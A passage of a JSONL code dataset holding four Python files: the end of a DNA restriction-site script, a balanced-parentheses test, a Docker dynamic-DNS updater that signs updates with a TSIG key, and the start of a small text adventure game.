reverse_palindrome(dna)\r\n\r\nfor pos, length in result:\r\n    fout.write(str(pos)+\" \"+str(length)+\"\\n\")","sub_path":"bioinformatics_stronghold/locating_restriction_sites.py","file_name":"locating_restriction_sites.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"200874815","text":"# Test of
 program 3.3: programa_3_03Prueba.py\n# Test of the program for checking balanced parentheses\n\nfrom ParentesisBalanceados import verificarParentesis\n\nverificacion = verificarParentesis(\"(2+1)\")\n\n\nif verificacion:\n    print(\"the parentheses are balanced\")\n\nelse:\n    print(\"the parentheses are not balanced\")\n\n","sub_path":"estructuras_de_datos/clase 23-05-2019/PruebaBalanceados.py","file_name":"PruebaBalanceados.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"236135488","text":"#!/usr/bin/env python3\nimport argparse\nimport logging\nimport docker\nimport json\nimport sys\nimport socket\nimport dns\nimport dns.exception\nimport dns.query\nimport dns.rcode\nimport dns.tsig\nimport dns.tsigkeyring\nimport dns.update\n\n\nlogging.basicConfig( format = '%(asctime)s:%(levelname)s:%(message)s', level = logging.INFO )\n\nconfigfile = 'docker-ddns.json'\ntsigfile = 'secrets.json'\n\nparser = argparse.ArgumentParser(description=\"Dynamic DNS updater\")\nparser.add_argument(\"-v\", \"--apiversion\", default=None, help=\"Docker api version\")\nargs = parser.parse_args()\nif args.apiversion: client = docker.from_env(version=args.apiversion)\nelse: client = docker.from_env()\n\n\"\"\"\nLoadConfig\n    Load the configuration options from configfile and tsigfile\n\"\"\"\ndef loadconfig():\n    logging.debug( 'Loading Config Information' )\n    configfh = open( configfile, mode = 'r' )\n    config = json.load( configfh )\n    configfh.close()\n\n    logging.debug( 'Loading DNS Key Data' )\n    tsighandle = open( tsigfile, mode = 'r' )\n    config['keyring'] = dns.tsigkeyring.from_text( json.load( tsighandle ) )\n    tsighandle.close()\n    return config\n\ndef startup():\n    logging.debug( 'Check running containers and update DDNS' )\n    for container in client.containers.list():\n        containerinfo = container_info( json.dumps( container.attrs ) )\n        if containerinfo:\n            dockerddns( 'start', containerinfo )\n\n\ndef container_info( container ):\n    inspect = json.loads( container )\n    container = {}\n    networkmode = inspect[\"HostConfig\"][\"NetworkMode\"]\n    container['hostname'] = inspect[\"Config\"][\"Hostname\"]\n    container['name'] = inspect[\"Name\"].split( '/', 1 )[1]\n    if ( \"services\" in inspect[\"Config\"][\"Labels\"] ):\n        container['srvrecords'] = inspect[\"Config\"][\"Labels\"][\"services\"]\n        print( \"%s\\n\" % ( container['srvrecords'] ) )\n    if ( ( str( networkmode ) != 'host' ) and ( 'container:' not in networkmode ) ):\n        if ( str( networkmode ) != 'default' ):\n            container['ip'] = inspect[\"NetworkSettings\"][\"Networks\"][networkmode][\"IPAddress\"]\n            container['ipv6'] = inspect[\"NetworkSettings\"][\"Networks\"][networkmode][\"GlobalIPv6Address\"]\n        else:\n            container['ip'] = inspect[\"NetworkSettings\"][\"Networks\"][\"bridge\"][\"IPAddress\"]\n            container['ipv6'] = inspect[\"NetworkSettings\"][\"Networks\"][\"bridge\"][\"GlobalIPv6Address\"]\n    else:\n        return False\n    return container\n\n\ndef dockerddns( action, event ):\n    config = loadconfig()\n    dnsserver = config['dockerddns']['dnsserver']\n    ttl = config['dockerddns']['ttl']\n    port = config['dockerddns']['dnsport']\n    update = dns.update.Update( config['dockerddns']['zonename'], keyring = config['keyring'], keyname = config['dockerddns']['keyname'] )\n    if ( \"srvrecords\" in event ):\n        srvrecords = event[\"srvrecords\"].split()\n        for srv in srvrecords:\n            values = srv.split( \"#\" )\n            print( \"%s %s\\n\" % ( values, event['hostname'] ) )\n    if ( action == 'start' and event['ip'] != '0.0.0.0' ):\n
        update.replace( event['hostname'], ttl, 'A', event['ip'] )\n        if ( \"ipv6\" in event ):\n            if event['ipv6'] != \"\":\n                ipv6addr = event['ipv6'].replace( config['dockerddns']['intprefix'], config['dockerddns']['extprefix'] )\n                update.replace( event['hostname'], ttl, 'AAAA', ipv6addr )\n                logging.info( '[%s] Updating dns %s , setting %s.%s to %s and %s' %\n                ( event['name'], dnsserver, event['hostname'], config['dockerddns']['zonename'], event['ip'], ipv6addr ) )\n            else:\n                logging.info( '[%s] Updating dns %s , setting %s.%s to %s' % ( event['name'], dnsserver, event['hostname'], config['dockerddns']['zonename'], event['ip'] ) )\n\n    elif ( action == 'die' ):\n        logging.info( '[%s] Removing entry for %s.%s in %s' % ( event['name'], event['hostname'], config['dockerddns']['zonename'], dnsserver ) )\n        update.delete( event['hostname'] )\n    try:\n        response = dns.query.tcp( update, dnsserver, timeout = 10, port = port )\n    except ( socket.error, dns.exception.Timeout ):\n        # no response object exists on failure, so bail out instead of calling rcode() on it\n        logging.error( 'Timeout updating DNS' )\n        return\n    except dns.query.UnexpectedSource:\n        logging.error( 'Unexpected Source' )\n        return\n    except dns.tsig.PeerBadKey:\n        logging.error( 'Bad Key for DNS, Check your config files' )\n        return\n\n    if response.rcode() != 0:\n        logging.error( \"[%s] Error Reported while updating %s (%s/%s)\" % ( event['name'], event['hostname'], dns.rcode.to_text( response.rcode() ), response.rcode() ) )\n\ndef process():\n    containerinfo = {}\n    events = client.events( decode = True )\n    startup()\n    for event in events:\n        if event['Type'] == \"container\" and event['Action'] in ('start','die'):\n            temp = client.containers.get(event['id'])\n            containerinfo = container_info( json.dumps(temp.attrs) )\n            if event['Action'] == 'start':\n                if containerinfo:\n                    logging.debug( \"Container %s is starting with hostname %s and ipAddr %s\"\n                                   % ( containerinfo['name'],\n                                       containerinfo['hostname'], containerinfo['ip'] ) )\n                    dockerddns( event['Action'], containerinfo )\n            elif event['Action'] == 'die':\n                if containerinfo:\n                    logging.debug( \"Container %s is stopping %s\" %\n                                   ( containerinfo['name'],\n                                     containerinfo['hostname'] ) )\n                    dockerddns( event['Action'], containerinfo )\n\ntry:\n    process()\nexcept KeyboardInterrupt:\n    logging.info( 'CTRL-C Pressed, GoodBye!' )\n    sys.exit()\n","sub_path":"docker-ddns.py","file_name":"docker-ddns.py","file_ext":"py","file_size_in_byte":5433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"181313296","text":"from character import Character\nfrom time import sleep\nimport monster\n\nprint('A hero is walking in the plains, searching for a challenge...')\nhero_name = input('Enter his / her name: ')\n\nhero = Character(hero_name)\ntutorial_monster = monster.Tiny_dino()\nsleep(1)\n\ntutorial_monster.print_monster()\ntutorial_monster.roar()\n\nsleep(1)\n\nprint('Suddenly, a monster appears!')\nsleep(2)\n\ntutorial_monster.look_sky()\n\nsleep(3)\nprint(\"And... he seems to be a little bit stupid. Let's practice.\")\n","sub_path":"simpleRPG.py","file_name":"simpleRPG.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}